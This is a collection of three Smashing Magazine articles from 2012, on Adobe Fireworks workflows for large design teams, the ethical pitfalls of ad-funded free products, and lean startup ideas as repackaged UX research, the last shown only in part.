Smashing Magazine

  • Workflow Tips: Useful Fireworks Techniques And Features For Large Design Teams


    While Fireworks can be a useful and powerful tool for any screen designer, several aspects of it make it really shine in an enterprise environment when used by both small and large design teams.

    What do I mean by “enterprise”? For the purpose of this article, enterprise can be defined as any environment where multiple designers, developers and other stakeholders collaborate on a project. In this situation, Fireworks excels for a variety of reasons.

    I’ll share the top five reasons why our user experience (UX) team at Citrix (which consists of about 20 designers, researchers and editors, working on Web, desktop and mobile applications) uses Fireworks. I’ll illustrate my points with a few practical examples, as well as examples from other design firms.

    1. The (Smart) Fireworks PNG File Format

    A huge benefit of Fireworks is that it saves images in the PNG file format. PNG files are viewable in any browser or image viewer. And Windows Explorer and Mac’s Finder will display thumbnail previews of your Fireworks PNG files when you browse them locally.

    Fireworks efficiently embeds all of the vector layer data into the metadata section of the PNG. This means you can view a Fireworks PNG file in any image viewer or directly in a Web browser, and if you open the same PNG in Fireworks, you have full editing capability over the vector paths, layers, pages, live filters, embedded bitmaps, symbols and so on.

    The PNG format is also very efficient. In our experience, even complex multi-page documents rarely exceed 5 MB.

    What does this mean in the enterprise? Quite a lot, actually!

    On our company’s internal network, we have a shared drive that everyone stores files on. When we want to share mockups with stakeholders in the company, we just point them right at the files. For instance, if a PNG file is located at X:/UXGroup/Project/Design.png, we can send a link to anyone in the company (i.e. http://shared/uxgroup/project/Design.png), and they can view the file in their Web browser — no need to export the Fireworks PNG to any other format!

    This saves us the additional steps of exporting JPGs (or PNGs) of our design files whenever we want to share them with stakeholders or with anyone who doesn’t have a copy of Fireworks.
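    The path-to-URL mapping described above is mechanical enough to script when you need to share many links at once. Here is a minimal sketch in Python; the share root (`X:/UXGroup`) and URL base (`http://shared/uxgroup`) are simply the hypothetical values from the example above, so adjust them to your own network setup:

```python
# Sketch: turn a shared-drive path into the intranet URL that stakeholders
# can open in a browser. The share root and URL base are hypothetical,
# taken from the example above.
from pathlib import PureWindowsPath

SHARE_ROOT = PureWindowsPath("X:/UXGroup")
URL_BASE = "http://shared/uxgroup"

def share_url(path: str) -> str:
    """Map e.g. X:/UXGroup/Project/Design.png to its browser-viewable URL."""
    rel = PureWindowsPath(path).relative_to(SHARE_ROOT)
    # Directory names are lowercased in the URL; the file name is kept as-is.
    parts = [p.lower() for p in rel.parts[:-1]] + [rel.name]
    return URL_BASE + "/" + "/".join(parts)

print(share_url("X:/UXGroup/Project/Design.png"))
# -> http://shared/uxgroup/project/Design.png
```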

    I can even edit a file in Fireworks while on the phone with a stakeholder (or fellow designer), and as soon as I hit “Save” in Fireworks, the person on the other end of the line can simply refresh their browser and see the changes I just made! Excellent for quick copy revisions and brainstorming.

    Nathan Smith describes a similar process in his article “Fireworks in Enterprise IT”:

    “Working as an interface designer at a Fortune 500 company, I used to save my work on a shared network drive. The user experience team had full access to our Adobe Fireworks PNG files, whereas all other stakeholders in the company (of which there were many) had read-only rights. This setup allowed my team to go about working in a typical fashion. When it was time to get sign-off for our mockup designs, rather than performing a batch export of hundreds of PSD files to JPG (or other) image format, we would just send a quick email: “Here are the project comps: http://10.10.10.xx/uxd/project/.”

    The approval team could then peruse the interface mockups at their leisure, without us having to do anything extra special to allow them to see our designs. Even better: being on a conference call with the primary stakeholders reviewing my PNG file in their browsers, I could edit the design in real time, based on their feedback. I cannot even begin to estimate the amount of time I saved.”

    This can also work beautifully with any FTP client or with synchronization software such as Dropbox. Just place your PNGs in your Dropbox folder and send the public URL to your stakeholders or share the folder with them. Now, whenever you hit “Save” in Fireworks, your changes will be instantly synced to everyone you have shared them with.

    One caveat to this approach is that browsers display only the first page of a Fireworks file. So, if your document has multiple pages, you will need to export each page to its own PNG file. On the positive side, Fireworks has fairly robust page-exporting options that make the process very easy, allowing you to export multiple pages at once.

    2. Layer Management

    If you are a Photoshop user, then you are probably very familiar with “layer management.” You have read articles on PSD etiquette and, heck, you might even be a Layer Mayor. While I can appreciate organization, managing layers and layer groups doesn’t sound like fun.

    Fireworks Manifesto
    (Illustration sources: Dan Rose, Tymn Armstrong, Michel Bozgounov)

    In Fireworks, I hardly ever glance at the Layers panel. Alan Musselman, designer and developer of Android games, sums it up nicely:

    “By the time you organized your layers in Photoshop I’m outside enjoying the weather because I’m finished with the project [in Fireworks].”

    How is this possible?

    Fireworks’ interaction methodology is similar to Illustrator’s: when you hover your mouse over each object on the canvas, the object is highlighted (its outline changes to red), and then you can simply select it by clicking on it (the outline will change to blue). You can also select several objects by clicking on each while holding Shift or simply by dragging the mouse across them all.

    Selecting objects on the canvas that are placed underneath other objects is possible, too, as Trevor Kay explains in “Interactive Prototypes and Time-Savers With Adobe Fireworks”:

    “The Select Behind tool enables you to select a top-most object and, with repeated clicking, select each of the elements directly beneath it in turn. This is yet another feature that helps you work more efficiently by not requiring you to awkwardly navigate the Layers panel, searching for an object either by name or tiny thumbnail.”

    In practice, this means you don’t need to bounce back and forth between the Layers panel and the canvas to find and select objects — you just work directly with them. I find it a much more intuitive way to work.

    What’s more, after selecting one or more objects, you can easily change many of their properties all at once:

    • Resize, skew, rotate and use the 9-Slice Scaling tool;
    • Change the fill or stroke (edit colors, work with gradient fills, change the size and type of stroke, etc.);
    • Add or remove Fireworks live filters (and edit their properties);
    • Apply styles;
    • Change the objects’ blending mode;
    • Add or remove textures and patterns;
    • Change the roundness of rectangle corners;
    • And much more.

    In short, what can be done with one object selected on the canvas can be done with multiple objects simultaneously. This really is a big time-saver, freeing you from having to hunt through the Layers panel!

    Besides being a much faster and more intuitive way to work, this also makes the process of multiple designers collaborating on the same file or project much easier.

    Finally, let me add that while naming layers and objects in Fireworks is often not necessary, it is still a good practice, especially when working on more complex projects. If you foresee opening an archived file years later or frequently sharing files with collaborators, then naming layers and objects will make file organization more efficient.

    3. Did I Mention Pages And Master Pages?

    Pages are a feature that illustrates a key difference between Fireworks and Photoshop. When working on complex interactions (a shopping-cart check-out flow, for example), showing how interactions unfold over time is essential. Having the ability to create multiple pages allows you to easily do this.

    It also helps to keep the number of separate design files low, which, combined with the fact that each page can have its own settings (canvas size, canvas color, export settings, etc.), gives you a ton of flexibility.

    And if you are using Pages in Fireworks, you can easily jump from a static design to an interactive prototype, which brings even more benefits (more on that later).

    If you use pages, you can also create master pages. Master pages allow you to define common elements that appear across multiple pages. For instance, you might put the website’s logo and header on the master page. As you create new pages, those elements will automatically appear on them, and if you change any element on the master page, the change will propagate throughout the document. If you need to modify the header or any other recurring element, this is far quicker than opening multiple files and editing the element individually in each one, or manually tweaking the same elements on multiple pages (or multiple layers).

    Let me quickly illustrate this feature. As an example, we’ll use the UI wireframe sketches of Chris Stevens.

    Suppose we have a design in which several elements — the header, logo, navigation and footer — will be the same on all pages. Let’s move them to the master page. All of the other pages will display these elements just as they appear on the master page:

    Master Page Elements On All Pages
    Elements on the master page will automatically appear on all pages.

    Next, suppose the design team decides that moving the logo to the right side and moving the navigation to the left would be better. The elements, which exist on the master page, need to be altered only once, then all of the other pages in the design will instantly reflect those changes:

    Simultaneous Update On All Pages
    Edit an element (or several elements) on the master page and see all pages updated with those changes!

    Fireworks has other features that make complex design projects easier. Here are just a few:

    • In Fireworks, you can turn any object or group of objects into a symbol. Just create a symbol and copy it to a few layers and/or pages; then, whenever you edit the symbol, all instances of it throughout the document will automatically update. Symbols can be of different types — graphic symbols, button symbols, and component (rich) symbols — each of which serves a different purpose and has different benefits. (If you want to learn more, the “Symbols” section in Adobe’s documentation for Fireworks might help.)
    • Fireworks gives you the option to share layers to pages (i.e. share the contents of one layer to selected pages), so if the content of a layer is updated, then the changes are automatically shown on all of the pages on which the shared layer appears.
    • If you work with states, you also have the option to share states to pages.
    • You can use styles in your Fireworks PNG documents (and can even import and export them to reuse in more than one document).

    By taking advantage of pages, master pages, symbols and styles, every designer on our team saves a huge amount of time every day!

    4. Interactive Prototyping Made Easy

    If you are creating a complex interaction that spans multiple pages, being able to prototype the interaction before investing precious development time in coding it is often very beneficial. Again, Fireworks comes to the rescue with its built-in capabilities to create simple click-through prototypes for multi-page documents.

    This subject was covered thoroughly by Smashing Magazine in a recent article by André Reinegger, “Create Interactive Prototypes With Adobe Fireworks” (quoted below), and one by Trevor Kay, “Interactive Prototypes And Time-Savers With Adobe Fireworks.” Check them out!

    “A click-through prototype is an interactive mockup of a website or application that allows you to click through different pages and states and is packed with key interactions. Creating such a prototype in Adobe Fireworks is very easy. All you have to do is prepare the design for exporting as an interactive prototype: create slices for all interactive areas on the screen, and make pages for all of the different states of the application.”

    By defining slices and hotspots, you can quickly link the pages in your document together and export them all at once as HTML files.

    Create Interactive Prototypes
    André Reinegger explains in detail how to create interactive prototypes with Fireworks. Pages and hotspots are key parts of the process.

    For instance, if your shopping cart has a “Buy now” button on the first page, you can specify that, when clicked, the button will take the user to page 2 of the design; and on page 2, you can define more interactions, and so forth. Similarly, you can create simple navigation between the pages or create links that point to external resources. What’s more, any behavior added to the master page will also be active on every other page in the document (so, a navigation bar graphic could serve as a navigation bar in the whole interactive prototype). Build it once and it works everywhere!
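    Conceptually, each exported prototype page is just an image with clickable regions linking to the other pages. As a rough, hand-written sketch of what such a page boils down to (the file names and coordinates here are hypothetical, and the markup Fireworks actually exports is more elaborate):

```html
<!-- page1.htm: the first page of the prototype, with one clickable hotspot -->
<img src="page1.png" usemap="#hotspots" alt="Shopping cart, step 1" />
<map name="hotspots">
  <!-- the "Buy now" button area links to page 2 of the design -->
  <area shape="rect" coords="420,310,540,350" href="page2.htm" alt="Buy now" />
</map>
```

    Each slice or hotspot you draw in Fireworks ends up as a clickable area like the one above, which is why the click-through prototype works in any browser with no plugins or scripting.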

    Interactive prototypes also help you quickly experience how an interaction feels as you click through it. You can even use these prototypes for user testing, to work out any kinks before investing in the actual development.

    Of course, you always have the option to use an external application for the live-interaction part of the design and development process, but for simple interactions, Fireworks does the trick nicely, and we don’t even have to switch to another app.

    5. Fireworks Component Library With Evernote

    One thing that makes collaboration between designers and developers much easier and more efficient is having a common set of design resources. Fireworks has a “Common Library” panel, but I won’t sugarcoat it: it’s not useful when multiple designers are collaborating and need to share a library of UI resources that needs to be updated over time.

    However, taking advantage of Fireworks’ use of vector PNG files, we can use a third-party service — namely, Evernote — with Fireworks to create and maintain a synchronized component library. This will allow all designers on the team to simply drag and drop Fireworks PNG elements into their layouts from a common source. (See “Creating a Pattern Library With Evernote and Fireworks,” in which I speak about this technique in greater detail.)

    Here are the benefits of this workflow:

    • Easily browsable
      Finding what you’re looking for is easier when you can just see it. And because source Fireworks PNG files can be viewed in the browser just like any regular image file, you can find the right asset in Evernote simply by browsing for it — while examining the previews! (This wouldn’t work with Photoshop, Illustrator or InDesign files because browsers cannot read their proprietary file formats.)
    • Searchable
      If you can’t find it by browsing, just search. And in Evernote, even the text in PNG files is indexed (a truly amazing feature, which, again, is possible because of the PNG format’s openness).
    • Drag and droppable
      Pulling elements into your layout is super-easy. Simply drag and drop them from Evernote into the Fireworks document!
    • Synchronized
      Any change made to a UI element propagates instantly, and everyone on the team always has access to the most recent version. Plus, Fireworks PNG files are fairly small, so synchronization is fast and easy.

    Evernote And Fireworks
    Together, Evernote and Fireworks make maintaining a shared component library an easy task.


    It’s fair to say that Fireworks is not perfect and has its limitations. For example, if you exceed a certain number of pages or objects in a file, Fireworks may suffer a drop in performance. The app is not 64-bit, so it cannot use all of the 16 GB of RAM you’ve just installed in your new computer, and its user interface is slightly different from that of other tools in the Adobe family.

    However, in our design practice, we’ve found that the benefits of Fireworks far outweigh the disadvantages.

    In one relatively short article, I can’t cover all of the reasons why we use Adobe Fireworks, but if you (and your design team) work in the field of screen design — UI, UX, Web, mobile — then I hope the five above are enough to give you ideas or inspire you to try something new!

    Further Reading

    Here are a few links to articles, tutorials and blog posts that discuss some of Fireworks’ most interesting features, as well as a few complex workflows that are possible with it:


    © Kris Niles for Smashing Magazine, 2012.

  • Uncompromising Design: Avoiding The Pitfalls Of Free


    Misaligned interests create tension in the design process that can lead to bad, and potentially unethical, design decisions that result in inferior products. In this article I will examine how the desire to build a large audience by giving away your products and services free of charge can cause conflicts of interest, which in turn can lead to dubious compromises in the design process that limit the full potential of your work.

    The recently launched Twitter competitor App.net, which raised over $800,000 in its first month of fund-raising and pre-sales, started its life with a simple premise: Twitter doesn’t work because the interests of the company and its users, along with the developers creating apps for its platform, are not aligned. They’re not aligned because, as a free product, Twitter doesn’t make money from its everyday users and developers, and thus holds no obligation towards them. Like most other free Web services, Twitter is building its business model on advertising, the advertiser becoming the customer and its users, bluntly put, the product.

    While it is possible that the interests of the multiple parties you are trying to satisfy with your product or service overlap, it is likely that there are also differences in what they want. In those cases where the interests vary, the product designer will have to pick the party whose interests will take precedence in their design decisions.

    For example, if you build an audience of users through a free product and then go on to sell advertising, there may arise a conflict of interests on the issue of privacy. The advertiser benefits from knowing more about the users, while some users may wish to keep their information to themselves. The two conflicting interests force the designer to pick a side, either to push for more information sharing in order to make the most out of advertising, or to take a stand on the privacy of their users while losing the potential for more advertising revenue. If they decide to give away user information without their permission they will also be giving away their users’ trust, along with their own integrity.

    Nothing Is Free

    All work requires compensation, whether monetary or otherwise. Sometimes we choose to work for free, monetarily speaking, but that choice is always based on some other form of compensation. When we give someone a gift, we receive emotional compensation in return, because the act of giving satisfies our desire to please someone we care about. We may give a gift to somebody we do not know, but this works the same way, providing us with emotional nourishment that satisfies a compassionate soul. Sometimes we create work for ourselves; that is, we work on something because we enjoy the creative process itself, the work being its own goal. In those cases, the process, together with the end product, is our compensation.

    An artist may work on a painting for its own sake, the work being its own reward, but they will not work for free when commissioned to produce a piece for somebody else, unless of course they have the desire to present the work as a gift, in which case they must know the person they are working for well enough and care about them enough to feel that the emotional reward outweighs the toil. When this is not the case, when they do not wish to give away their work as a gift, they will seek monetary compensation, for even though they may enjoy the process of creation itself, the act of giving away their finished work and their time — and thus, a little of their life — requires fair compensation.

    Money Or Love
    The designer’s dilemma lies often in the difficult choice between monetary payment and satisfaction of a job well done. Image by Opensourceway.

    Developers of today’s free Web apps and sites do not know their users well enough in order to give away their work as a gift. The bond between them and the recipient is not so strong as to generate enough desire in their hearts to wish to give away their work for free. One exception to this is the open source movement, in which case the work is given away as a gift, though the compensation has less to do with the recipient than with the intended function of the work.

    Open source software is first and foremost created to satisfy a certain goal that the developer has, and the fulfillment of this goal is reward enough for them. They then release their work into the world and may derive further benefit, like patches to the software and prestige for themselves, but this further benefit is only an extra: icing on a cake that has already been eaten. In a few cases the software takes off and grows at a rapid pace, but the initial compensation has already been paid, the developer having gotten what they wanted when they first set off to create it.

    Contrast this with free products and services that are not open source. Those products are given away free of charge, but they are not given away free from the maker’s desire for compensation. Since compensation does not come from the users it is sought elsewhere.

    Advertising: A Gateway To Conflict Of Interests

    Typically, this path leads to advertising. If the users aren’t going to pay for their product, the advertiser will pay for the users. The product developer begins to introduce ads and other forms of sponsorship deals. This creates a conflict of interests. On the one hand, the product serves a specific purpose for the user; on the other, an ulterior motive is introduced in the form of advertising, which in turn uses the product as a means to sell something else, the product itself being relegated to the status of a promotional vehicle. The focus of the product is split in two:

    1. it must work to perform a certain function for the user, and
    2. it must get the user to click on an ad.

    While it is possible to keep these two goals separate, in many situations they come into conflict, which forces the designer to pick sides and make compromises.

    Some product designers and developers proceed to mask this conflict of interests by pretending that the two goals don’t actually point in different directions, and that their primary focus is always on making the best product possible, which in turn brings them more users, and thus more advertising money, the latter being the outcome of the former.

    This stance is taken for two reasons. First, telling users that they are the product is not going to go over well with them, and neither will admitting that you are trading design decisions that benefit the user for design decisions that benefit only the advertisers.

    Second, this viewpoint may even be a subconscious reaction to the inner dilemma that the product designer has to face when they are forced to pick between two or more conflicting interests. A good designer does not want to compromise their integrity. They want to make the best product they can, which means a product that best serves its primary purpose, that is, its function for its users, so they try to resolve the conflict with a different explanation.

    Twitter Changes
    Since Twitter relies on advertising, it recently had to make some quite unpopular decisions. The company limited access, enforced display requirements, and formed guidelines for what sort of apps it wants (and doesn’t want) to see on the platform.

    But this doesn’t work. You can pretend the conflict of interests isn’t there, but that will not make it disappear. For example, Twitter recently began to push back on developers who make apps for its platform by limiting access, enforcing display requirements, and forming guidelines for what sort of apps it wants to see on the platform, and what sort of apps it doesn’t. Apps that are seen to compete with Twitter’s main offering, i.e. consumer micro-blogging, are discouraged.

    Twitter’s initial goal was the creation of a simple micro-blogging service, which they’ve allowed to evolve into different forms to suit its many uses. But now, having to face the reality of needing to make the service pay, they turn to advertising, and in turn are forced to enact much greater control over how the user interacts with their product in order to reshape the service into a viable advertising channel. Now, there is nothing wrong with Twitter taking the advertising route to make money. That’s not the issue. What’s wrong is the situation in which they find themselves, having to strike a compromise between the needs of the advertiser and the needs of the many developers of Twitter apps who have helped get the service to where it is today.

    Twitter does not technically owe anything to those developers, but to push them aside when you’ve reaped the rewards of their labor is not a decent thing to do. The roots of the problem are unclear commitments, which have been there from the very beginning. If the developers paid for the service, Twitter could work without hesitation on delivering them the best platform and API for their apps. Without this commitment, the various parties work together on a foggy perception of aligned interests, only to later find themselves in trouble when they discover that their interests aren’t so aligned after all.

    Then we have the problems with privacy breaches that pop up all the time with services like Facebook and Google (Wikipedia has whole pages dedicated to listing criticisms of the two companies, here’s one for Facebook, and one for Google). Once again, these companies don’t make money selling a service to the end user, they make money from selling advertising. This creates a conflict where the product developer has to decide whether to focus on satisfying the needs of the user, or making the service more lucrative to advertisers by sometimes breaching the privacy of their users. The issue would not exist if people paid for their search service or for their social network, which would remove the advertiser from the equation and let the company focus solely on delivering the best product for the user, but as this isn’t the case, we are left in a situation where the interests of one party are compromised for the interests of another.

    There are also the really obvious dishonest design decisions used in social games like those of Zynga, whose interests lie in promoting the product in order to pull in more users rather than in actually making a good product. For example, they have a dialog prompt with only one button, which says “Okay”. The dialog asks users whether they will give the app greater access to their Facebook timeline, i.e. let it make posts on their behalf, but there is no option to close the dialog, only to agree with it.

    Upon clicking the button, the actual Facebook permission box pops up which lets the user decide whether or not they wish to give these permissions to the app, but because the previous box has already conditioned them to agree, they are more likely to simply click “Okay” again in order to proceed, rather than stop to make a conscious decision.

    Manipulative Zynga Prompt
    A manipulative Zynga prompt. The two buttons, “Accept” and “Cancel”, are about sharing a message with your friends, but the wording makes it seem as if they are to do with accepting the reward itself.

    On the one hand, the designer is tasked with creating an informative dialog box meant to help the user make a rational decision; on the other, they are tasked with creating a dialog box that will manipulate the user into acceptance, and because they are not committed to delivering the best service they can for the user, they pick the latter. The interesting thing with Zynga is that they actually do make money from their users, but only from the small percentage who pay, not from the whole user base. This means that to make money they have to capture masses of users, like dropping large fishing nets into the ocean to catch the few “whales” (the industry term for big spenders) along with a pile of bycatch.

    Lastly, consider all the online blogs and magazines that cram their pages with ads, leaving little room for the content, and the content itself, which takes on an ever more sensationalist nature by the day, its only purpose being to bring in more page views, not to enlighten readers. For example, The Huffington Post split-tests headlines to arrive at the one that brings in the most hits, thereby trading the experience and judgement of the author for the impulses of the masses. Because the reader is not the one paying, these sites hold little loyalty towards them, leading to design decisions that optimize for page views and ad clicks rather than for the best possible reading experience. Such sites also like to introduce design tricks like pagination, the goal of which is, once again, to boost page views, while they try unsuccessfully to convince us that clicking multiple times through a set of small page links somehow leads to a better user experience.

    The conflict of interests that arises naturally in free products derails the designer’s core goal of making a great product, that is, a product that aims to fulfill its primary purpose of satisfying the user as best as possible. Loyalty to multiple parties with disparate goals is impossible, which leads to friction in design decisions and in the soul of the designer, forcing them to make dubious compromises in their work. Each small compromise doesn’t seem like a big deal, a little manipulative form box here, a tiny breach of privacy there, but remember that the final product is the sum of its parts, and so in the end, the multitude of small compromises add up into a substantial whole.

    If Compromise Isn’t An Option, Free Is Not A Solution

    A compromise is a concession on the part of all the parties involved, not just some, and you cannot compromise on principles without destroying them altogether. For example, there can be no compromise between truth and falsehood for you cannot make something just a little less true. In the same way, surrendering your users’ privacy or manipulating them into taking an action for your own gain is to surrender your honesty, and in turn, a part of the moral foundation upon which your work is built.

    Whenever you feel a tension in making a design decision that you think is caused by a conflict of interest, ask yourself exactly what compromise you’re asked to make. Are you asked to make a fair concession between one party and another from which both will derive benefit, or are you asked to take something from your users without their permission, or make them do something they have not agreed to do? Are you asked to make a decision that will compromise the integrity of your work?

    Faced with this dilemma, what do you do? The answer is simple, and it is the very thing you should have been doing all along: charge money for your products. By selling your work instead of giving it away for free, your interests and those of your customers — who are no longer just users — are aligned: they, and not some outside party, provide the compensation for your work, leaving you free to focus on delivering the best product for them. This is not only moral, in that you no longer have to compromise the interests of one party for those of another; it is also a much simpler solution. You make a product and sell it directly to the customer: no need for other parties, conflicting interests or dubious design decisions. App.net proclaims ad-free social networking in its banner. Because the membership fees are placed right next to it, the user never wonders where the catch is.

    It works, too. A great example is the project which I’ve mentioned at the start of the article. Its creator, Dalton Caldwell, wasn’t satisfied with the way Twitter was treating its developers, so he set out to create his own micro-messaging service, with the difference that this service would be paid for at the outset by its users and developers. Caldwell set a minimum of $500,000 for his fundraising month, during which people could sign up for a year of service to a product that didn’t yet exist.

    In just a month, he raised over $800,000 and launched an alpha version of the service. Critics said that nobody would ever pay for a Twitter-like service, but clearly there is enough value for some people to sign up for a paid alternative. It is far too early to judge the future of the venture, but the initial fundraising success shows that people are prepared to pay for services they care about, even in the presence of free, established alternatives.

    Charging For Online Content Works

    On December 10th, 2011, the stand-up comedian Louis C.K. released his full-length special Live at the Beacon Theater on his website as a DRM-free download for $5. Two weeks later, sales from this self-published special had exceeded $1 million. Because the download was DRM-free, people could easily have pirated it, but given the fairness of the price and the package, that route just wasn’t worth it. Yes, not everyone can re-create the success of Louis C.K., but that’s not the point. Of course, to drive product sales you need to generate enough excitement and interest — that’s the job of marketing. The point is that selling digital goods on the Web is possible and, when you have something people genuinely want, can be very lucrative. The success of Louis C.K. has since inspired other comedians, namely Aziz Ansari and Jim Gaffigan, to adopt a similar distribution model.

    Last year, The New York Times put up a paywall around its online articles. The paywall allowed visitors to read 10 articles a month free of charge but required a paid subscription for subsequent access. The implementation of the wall was very porous — getting past it took only a few simple steps — so many critics believed that people couldn’t be persuaded to pay. Yet just four months after the paywall’s introduction, 224,000 readers had signed up for a paid subscription, not far short of the company’s goal of reaching 300,000 subscribers within a year. Combined with sign-ups through other channels, such as Kindle and Nook subscriptions, the total number of digital subscribers rose to around 400,000. Although this number still makes up a small portion of the newspaper’s revenues, it shows healthy growth and proves that charging for online content can work, even when everyone else is giving theirs away for free.

    The New York Times Paywall
    The New York Times paywall prompt. Even though there are simple tricks to get past it, many people still prefer to pay for their content.

    Other newspapers, like The Wall Street Journal and The Economist, successfully use the same model by keeping most of their content accessible only to paid subscribers. When you charge your readers for content, you no longer need to chase page views by creating sensationalist work, nor does your website need to squeeze ever more page loads out of each visitor through design tricks like pagination. Once your readers have subscribed and paid, they’re going to read what you have to say no matter how attention-grabbing or plain your headlines are, freeing your authors and journalists to focus on creating work that enlightens your readers, not shallow content designed to spread.

    For an example of design-related publishing, consider the success of Nathan Barry and Sacha Greif, whose two eBooks combined have made them $39,000 in revenue — and are still selling. Bloggers like to give away their experience for free, and while this is great for readers, it doesn’t help pay the author’s bills. Some put up a few ads on their site, but unless they consistently generate a lot of traffic, the revenue from those ads won’t amount to much. Instead of chasing after advertising pennies, why not package your experience into a book? If your audience is tech-savvy, you won’t even need to print the book — just offer a DRM-free eBook package that your readers can consume on any device of their choice. The success of Barry and Greif shows that people are ready and willing to pay for good content; you just have to give them the opportunity to do so.

    As for an example of well implemented advertising, consider The DECK ad network, which includes some of the top tech sites around the Web like the Signal vs. Noise blog from 37signals, Dribbble, Instapaper, A List Apart and many more. The ad network uses a very unobtrusive 120×90 pixel banner, with a sentence or two of text underneath. Its small size shows respect for the end user by keeping advertising within strict limits. It’s a subtle way to advertise which has inspired other networks to offer the same format, such as AdPacks from BuySellAds. This small format won’t work for everyone — most of the sites that use The DECK rely on other sources of revenue — but it is a good way to deliver a cleaner experience for the user while still providing an advertising channel.

    Summing Up

    Free products themselves are not the problem. We give gifts all the time, and the giving of them to the people we care about is reward enough for us. The problem is the giving away of free products and services while still expecting compensation. If the compensation does not come directly from the user, the developer proceeds to extract it by other means, which usually involves bringing other parties to the table, leading to a conflict of interests. When the interests of the user and the product maker are not aligned, not only is the feature set neglected, but the product becomes one of a wholly different nature. The conflict is not just external; it exists inside the mind of the designer, and a battle is fought every time they are put into a situation where they must limit their full creative potential by compromising the interests of the user.

    It doesn’t have to be this way. People will pay for design and content created to serve them, not to exploit them. People have paid for centuries, and they will continue paying for goods and services that give them value. Instead of picking the path of free design, take the road of moral design — design firmly based on the moral values that guide your life and your work. By turning your users into your customers you eliminate the conflict of interests and thus free your mind to work fully on the problem at hand, and any compromises that you make will be real and fair compromises, that is, design judgements that improve your product by taking it in the direction you want it to go, not dubious choices that surrender your values, limit your creativity and cripple your work.


    © Dmitry Fadeyev for Smashing Magazine, 2012.

  • Entrepreneurship: Lean Startup Is Great UX Packaging


    When Albert Einstein was a professor at Princeton University in the 1940s, the time came for the final exam of his physics class. His assistants passed the exam forms to the hundreds of students, and the hall was dead silent. Suddenly, one of the assistants noticed that something was wrong.

    She approached Einstein and told him that a mistake had been made with the exam form and that the questions were the same as those in the previous year’s exam. Einstein glanced over the exam form and said that it was OK. He explained that physics had changed so much in the last year that the answers to the questions were now different.

    The lean startup movement, like Einstein’s physics exam, talks about the same things that UX people have talked about for decades. The difference is that people are now listening. Lean UX is an approach that quickly followed the lean startup movement. It is not a new thing. It’s just a new name for things that were always around. The difference is in the packaging of these ideas.

    One other factor that has changed dramatically is the audience. Entrepreneurs and startup founders have always been asking themselves how to develop great products. The answer that UX practitioners, usability professionals and UX researchers have been giving them was too complicated. UX people (me included) have been using disastrous jargon that only we understand. We have been talking about usability tests, personas, field studies and areas of interest in eye-tracking studies.

    The lean startup answer to the same question uses plain language that people understand. When I say, “We need to conduct a contextual inquiry,” I usually get a deer-in-the-headlights reaction. When a lean startup person says they are “getting out of the building,” it is a whole different story. We mean the same thing; we use different words.

    Does it matter? I think it does. Who would have thought that startup companies would be looking for UX people and UX founders, and would become interested in doing usability testing, iterative design and customer interviews?

    This article takes the principles of the lean startup and suggests their UX research equivalents. Hopefully, it sheds some light on why the lean startup concept is so very well accepted in the entrepreneurial world and why startups suddenly want to do UX research and design.

    Validated Learning And Usability Testing

    The lean startup movement claims that startups exist not just to make stuff, but to learn how to build sustainable businesses. This learning can be validated scientifically by running frequent experiments that enable entrepreneurs to test each element of their vision, as outlined by Eric Ries in his book The Lean Startup. In my interview with Ries (embedded below), the most familiar voice of the lean startup movement, for my book It’s Our Research, he calls for entrepreneurs to double-check their assumptions to verify that they are right. He argues that validated learning exists to help entrepreneurs test which elements of their vision are brilliant and which are crazy.

    In the UX world, we call on product development people to evaluate their design assumptions in usability tests. We urge them to ask users to complete tasks while using the think-aloud protocol in order to identify usability problems.

    An interview with Eric Ries about getting stakeholder buy-in for UX research and how it relates to the Lean Startup ideas.

    When entrepreneurs hear “validated learning,” they can see the benefit. They understand that this concept refers to proving or disproving their assumptions. When they hear “usability testing,” they associate it with a time-consuming, money-eating, academically oriented project.

    Validated Learning
    Validated learning: You believe you’ll find a new continent if you keep sailing west. So, you test your idea and verify the route using scientific methods and measurements.

    Build-Measure-Learn And Think-Make-Check

    The fundamental activity of a startup is to turn ideas into products, to measure how customers respond and then to learn whether to pivot or persevere. All successful startup processes should be geared to accelerate that feedback loop. As Ries explains, the feedback loop includes three primary activities: build (the product), measure (data) and learn (new ideas).

    Build-Measure-Learn And Think-Make-Check
    Eric Ries’s Build-Measure-Learn feedback loop and the Think-Make-Check UX cycle.

    The lean UX approach calls for a slightly different cycle: Think-Make-Check. The difference, according to Janice Fraser (cofounder and first CEO of Adaptive Path), is that this latter feedback loop incorporates your own thoughts as a designer, not just ideas learned through measurement. Janice, who now leads LUXr, describes the pattern of a lean startup as an endless loop consisting of two steps: Prove-Improve, Prove-Improve, Prove-Improve. This means that you design something, learn about it, make it better, learn again and so on. There is no room for people who are afraid to put their creations on the line for testing. These two feedback loops are very similar and make a lot of sense to people in both the entrepreneurial and UX worlds.

    Build-Measure-Learn: How do you build the fastest ship? You try to build and test your hypothesis; you measure the result; and then you learn new knowledge that you can bring to your next ship design.

    MVP, And “Test Early And Often”

    The minimum viable product (MVP), as Ries explains it, is a version of the product that enables a full turn of the Build-Measure-Learn loop with a minimum amount of effort and the least amount of development time. How many times have UX people told their stakeholders that for every dollar spent on solving a problem during product design, $10 would be spent on the same problem during development, and $100 if the problem had to be solved after the product is released?

    We’ve known for years that product prototypes are to be evaluated early in the development process (not just prior to launch). We’ve also known that these evaluations are most valuable if they are repeated throughout the process. The MVP is, in fact, an early prototype that serves as a tool to learn and test the team’s assumptions.

    Minimum Viable Product
    MVP: You want to build a huge ship, but instead of building the ship right from the beginning, you start by testing your idea with minimal design to see if it floats.

    Pivot And Iterate

    To use the analogy of a basketball “pivot,” one foot of a business is always firmly rooted in what the team has learned so far, while the other foot is moving and exploring new ideas for the business. Instead of taking the big risks of developing something huge, lean startups take small steps forward, developing things and pivoting to better directions. This way, if they fail, the fall will be less painful and will allow them to bounce back and continue. On the other hand, if they had climbed a big cliff, the potential fall would be deadly.

    This reminds me of why we pitch for an iterative design process or for using the RITE methodology (rapid iterative testing and evaluation). Many product development decision-makers feel that the best time to conduct a usability test is near launch time, when things look good and are “ready” for users to play with. Many UX research practitioners know that when they agree to conduct a usability test right before a product is launched, especially if this is the first usability test for the product, the following is most likely to happen:

    1. The study will result in a long list of defects (i.e. usability problems);
    2. The product team will be presented with a long list of issues exactly when they are trying to shorten the list of issues;
    3. Only the easiest problems to fix will be taken care of;
    4. The most important problems will be ignored and the product will be launched;
    5. By the time the team is ready to start working on the next version, there’s already a long list of new features to be developed, leaving the usability issues low down on (or off) the priority list.

